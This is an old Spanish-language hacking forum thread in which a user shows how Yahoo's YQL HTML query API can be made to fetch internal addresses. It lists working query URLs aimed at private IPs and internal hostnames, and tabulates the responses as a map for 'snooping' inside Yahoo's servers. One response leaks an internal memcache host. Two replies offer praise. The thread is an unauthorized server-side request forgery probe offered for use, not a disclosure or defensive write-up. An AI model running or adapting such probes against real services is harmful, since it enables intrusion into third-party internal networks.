Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Trolleando en Yahoo Query Languaje (YQL)

  • 2 Respuestas
  • 2314 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado WHK

  • *
  • Underc0der
  • Mensajes: 76
  • Actividad:
    6.67%
  • Reputación 4
    • Ver Perfil
« en: Junio 27, 2013, 11:54:26 am »
Vamos a convertirnos en trolls por un par de minutos y vamos a darle un vistazo a la consola QL de Yahoo la cual permite realizar multiples consultas a distintas apis de Yahoo pero a modo de SQL.

Ejemplo de una simple query:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=show tables

Esto nos devolverá todas las tablas (servicios, apis).

Ahora probaremos utilizar la api HTML de la siguiente manera:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://underc0de.org/foro/"

Esto nos devolverá el contenido HTML parseado en XML.

Ahora que ya entendimos un poco sobre el funcionamiento de YQL vamos a trollear un poco:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://192.168.1.1/"

Nos retornará:
Código: XML
  1. <url ... http-status-code="502" http-status-message="Network is unreachable">http://192.168.1.1/</url>

Pero si intentamos entrar a la subred local 0.1: http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://192.168.0.1/"
Código: XML
  1. <url ... http-status-code="403" http-status-message="Forbidden">http://192.168.0.1/</url>

Esto nos demuestra una cosa: que la api de peticiones HTTP no filtra ips ni dominios :D asi que podemos pasearnos por toda la red local si queremos ya que al intentar entrar a la puerta predeterminada de enlace (router o switch o lo que sea) nos arrojó un error 403 que probablemente haya retornado el panel de administración del router ya que cuando probamos con otras ips locales simplemente nos dice que es imposible conectarse (error 502 Cannot find server).

Probamos otras urls sensibles:
http://localhostx/ : 502 - Cannot find server
http://localhost/ : 200 Empty
http://192.168.0.1/ : 403 (necesita autorización, ¿como?: buena pregunta)
http://192.168.1.1/ : 502 - Network is unreachable
http://adminx/ : 502 - Cannot find server
http://admin/ : 400 - Bad Request
http://zebra/ : 502 - Cannot find server
http://jaguar/ : 400 - Bad Request
http://intranet/ : 502 - Cannot find server
http://admin/login/ : Timed out waiting for operation - failing node: memcache4.yql.bf1.yahoo.com/68.142.224.71:11211
http://68.142.224.71/ : 502 - Connection refused
http://local/ : 404 - Not Found Tenemos acceso a un servidor WEB local!
http://dev/ : 404 - Not Found on Accelerator Tenemos acceso a un servidor WEB local!
http://developer/ : 404 - Not Found on Accelerator Tenemos acceso a un servidor WEB local!
http://servers/ : 400 - Bad Request
http://labs/ : 400 - Bad Request

Información útil para comenzar a husmear dentro de los servidores locales de yahoo :)

Saludos.
« Última modificación: Junio 27, 2013, 12:03:35 pm por WHK »

Desconectado Alvares97

  • *
  • Underc0der
  • Mensajes: 68
  • Actividad:
    0%
  • Reputación 0
  • Todo es tan Dificil antes de ser sencillo
    • Ver Perfil
    • Playa de bits
    • Email
« Respuesta #1 en: Julio 11, 2013, 10:38:18 pm »
muy buena info :)
esta permitido caerse pero levantarse es obligatorio

Desconectado morodog

  • *
  • Underc0der
  • Mensajes: 350
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: MorodoG
  • Twitter: m4r4d4g
« Respuesta #2 en: Julio 20, 2013, 11:33:35 am »
Muy bueno tio!!

 

¿Te gustó el post? COMPARTILO!